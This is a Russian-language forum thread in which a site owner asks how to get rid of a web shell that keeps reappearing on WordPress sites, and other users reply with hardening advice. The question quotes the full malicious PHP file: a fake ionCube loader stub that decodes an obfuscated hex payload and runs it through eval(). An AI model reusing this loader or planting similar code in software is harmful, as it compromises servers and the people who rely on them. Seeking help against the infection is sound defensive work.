@vangelder

Как избавиться от шелла на сайтах Wordpress?

Добрый день,

Ситуация следующая:
Есть шаред хостинг, на нем лежит порядка 10 сайтов на WordPress. На все сайты установлен плагин защиты от вирусов и всякой дряни Wordfence. При сканировании сайтов данный плагин ругается на файлы типа xxxxx.php, файлы могут находится где угодно (в папках плагина, темы, wordpress папках). В самом файле прописан следующий код:

код
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xc7a-0x7ca)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;
?>

2B4637P46bI70203dW20S41Y7O2O72N61I79H28V27E6Hc70U7K77L26Bb6X1273Fd3e27G6Y3U6
76A1Z63S6aK6f27293b24Y6M26Sa6c6a203d2S04172726R17928276a6X26d7F46dP75273d3Z
e27A7Z77I2I62777172272T93Lb66O6fV726561K6X36M8L20L2Z841H72726J17928246Q3746
Tb702Jc2N0245Lf504f53542c202S4Q62O6aC6Ic6aR2EcV2P0245Qf4E3P4fV4Pf4b494529Z2
B0K61732024H64F72W646362X65Z2E92C0Q7bO6H66Nf7265616I36C8202C8L2C464E7C26I4Y
636I265B2L06R173A20246eC616168203dO3Qe2024P696Nb6175T77G2920Z7DbJ2469V6bK61
75772H0K3dK204070O6163R6Lb2822Z482a22R2c2N0246X9X6b61K75F77293b246e616D16B8
20Z2Re3Ud20F22U31393766A3Z03X932362d6666616L6Q2dT34L3X46J63D0O2Xd6Q1Z3L5J3L
5652JdX3H3L6131393K53Y6S3039B36396Z33722V3b246A9B666Ub6H5662K0J3Yd20I24I69Z
6Qb6O175772C05e2N0C7J3756T2T7P3747T2E2T87E3M74Q725f7C265K7065617428Z246e6C1
S61O682AcD20N287X374726c6C5L6Te2824696Cb617U5Y7K729D2V02f2073747D2Z6Lc6K5L6
eW28Y24I6e616H16I82929W2S02b2T0D31U2M92c203H02c2D07E37472M6BcO656e28H2L4696
b6F1C75Z772E9293b2469O6P66Vb6566203Od206578H70M6c6f646Q52V82P223T222cS2X024
6F9G66T6Hb6N5662A9W3Pb696J620R2F86X36fJ756e742824E6Y9W666b6W5T6D62D9G2Y03dQ
3Fd2K0Q33H2W92E07b65R7L661C6c2F8V246966T6Jb65665bP3Y15d282469666b65D6V6J5b3
25Rd2929V3b65W7E8697U4F2J8S2Y93b7Ed7Pd7d


Файлы с таким содержимым имеют различную дату создания (могут быть датированы и месяцом назад и годом и т.д.) т.е. отследить откуда он появился не представляется возможным.

После сканирования сайтов плагином WordFence и удаления всех этих файлов - пару дней тишина. И потом все заново начинается - появляются файлы и WordFence начинает ругаться.

Нечто подобное описано здесь - Вирус на сайте WordPress? - и там помогло сканирование, замена паролей к БД, и паролей пользователей. В моем случае НЕ срабатывает. Как уже сказал, через пару дней все начинается заново.

Может кто знает действенное решение данного недуга.
Заранее спасибо за помощь.
  • Вопрос задан
  • 930 просмотров
Пригласить эксперта
Ответы на вопрос 4
iNickolay
@iNickolay
Может кто знает действенное решение данного недуга.

Конечно знаем: нужно найти вирус и удалить его.
Ответ написан
В целом, вся платформа WP дырява, также как и куча плагинов, написанных на ней.
Можно попробовать некоторые решения:
  1. устанавливать лишь проверенные модули к WP
  2. как минимум, держать всё ПО всегда обновлённым (ОС + Apache/Nginx/etc + WP + модули) - последние версии с устранением известных уязвимостей CVE.
  3. правильно настроить веб-сервер (включая upload), права доступа к файлам и папкам, межсетевой экран (firewall), СУБД
  4. использовать дополнительно WAF
Ответ написан
@Dvlbug
Обычный сисадмин
Создать новый сервер, на него перенести только Wordpress. Сравнить хэши с оригинальным дистрибутивом.
Установить Tripwire и Roothunter, запрет на исполнение + проверить права на папки.
Ответ написан
Комментировать
@SunHere
Никакие плагины не помогут вам найти вирусы со 100% уверенностью, что говорит Ai-bolit пропускает вирусные файлы. Только комбинированный подход с проверками по базам и полу ручная проверка даёт хороший результат
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы